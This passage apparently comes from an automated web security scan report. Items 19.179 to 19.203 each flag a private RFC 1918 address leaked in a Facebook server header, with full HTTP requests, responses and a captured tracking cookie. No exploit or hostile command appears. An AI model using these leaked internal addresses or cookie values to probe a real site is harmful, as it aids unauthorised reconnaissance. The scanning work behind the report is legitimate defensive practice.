User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.121.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:03 GMT

/*1308241083,171342120*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.179. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.86.30

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.86.30
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:22 GMT

/*1308239842,171333150*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.180. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.245.61

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.245.61
X-Cnection: close
Date: Thu, 16 Jun 2011 19:14:07 GMT

/*1308251647,171373885*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.181. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.235.34

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb4cb576c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.235.34
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:44 GMT

/*1308242324,171371298*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.182. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.64.32

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df236de4684%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f13fbd2c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.64.32
X-Cnection: close
Date: Thu, 16 Jun 2011 12:46:17 GMT

/*1308228377,171327520*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.183. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.70.62

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.70.62
X-Cnection: close
Date: Thu, 16 Jun 2011 16:18:00 GMT

/*1308241080,171329086*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.184. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.131.128

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.27.131.128
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:09 GMT

/*1308239529,169575296*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.185. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.48

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.204.48
X-Cnection: close
Date: Thu, 16 Jun 2011 19:08:56 GMT

/*1308251336,171363376*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.186. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.56.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.56.50
X-Cnection: close
Date: Thu, 16 Jun 2011 12:51:19 GMT

/*1308228679,171849778*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.187. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.149.125

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.149.125
Connection: close
Date: Thu, 16 Jun 2011 13:17:12 GMT

/*1308230232,169907581*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.188. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.184.185

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.184.185
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:49 GMT

/*1308238909,169916601*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.189. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.78.37

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.78.37
X-Cnection: close
Date: Thu, 16 Jun 2011 17:14:57 GMT

/*1308244497,171331109*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.190. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.247.108

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1cc2374ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.32.247.108
Connection: close
Date: Thu, 16 Jun 2011 13:17:19 GMT

/*1308230239,169932652*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.191. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.202.34

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34a75172c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbad24028%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.202.34
X-Cnection: close
Date: Thu, 16 Jun 2011 16:28:26 GMT

/*1308241706,171362850*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.192. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.116.35

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2724bfef%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b3573fd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.116.35
X-Cnection: close
Date: Thu, 16 Jun 2011 18:17:04 GMT

/*1308248224,171340835*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.193. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.19.61

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.19.61
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:11 GMT

/*1308241391,171381565*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.194. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.235.63

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.235.63
X-Cnection: close
Date: Thu, 16 Jun 2011 13:48:10 GMT

/*1308232090,171895615*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.195. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.19.54

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df652b1054%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a28c999%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.55.19.54
X-Cnection: close
Date: Thu, 16 Jun 2011 16:23:13 GMT

/*1308241393,171381558*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.196. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.32.49

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df102156e5c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1aa8c6f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.32.49
X-Cnection: close
Date: Thu, 16 Jun 2011 14:45:02 GMT

/*1308235502,171319345*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.197. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.150.50

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.150.50
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:28 GMT

/*1308247288,171349554*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.198. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.206.65

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfe01abf48%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff284b08ca8%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.42.206.65
X-Cnection: close
Date: Thu, 16 Jun 2011 13:06:51 GMT

/*1308229611,170577473*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.199. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.193.54

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.193.54
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:50 GMT

/*1308231470,171360566*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.200. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.146.35

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.146.35
X-Cnection: close
Date: Thu, 16 Jun 2011 17:25:16 GMT

/*1308245116,171348515*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.201. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.37.42

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df16aca2c6c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3306de7a4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.37.42
X-Cnection: close
Date: Thu, 16 Jun 2011 15:05:44 GMT

/*1308236744,171320618*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.202. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.69.51

Request

GET /ajax/v6.php?v=check6&pingonly=false HTTP/1.1
Host: check6.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df32d339e58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb16b3e24%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 131
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.69.51
X-Cnection: close
Date: Thu, 16 Jun 2011 13:22:27 GMT

/*1308230547,171328819*/

window._ip_version = {"address":"173.193.214.243","version":4,"variant":null};window._ip_w["check6"] = 0;

19.203. http://check6.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check6.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

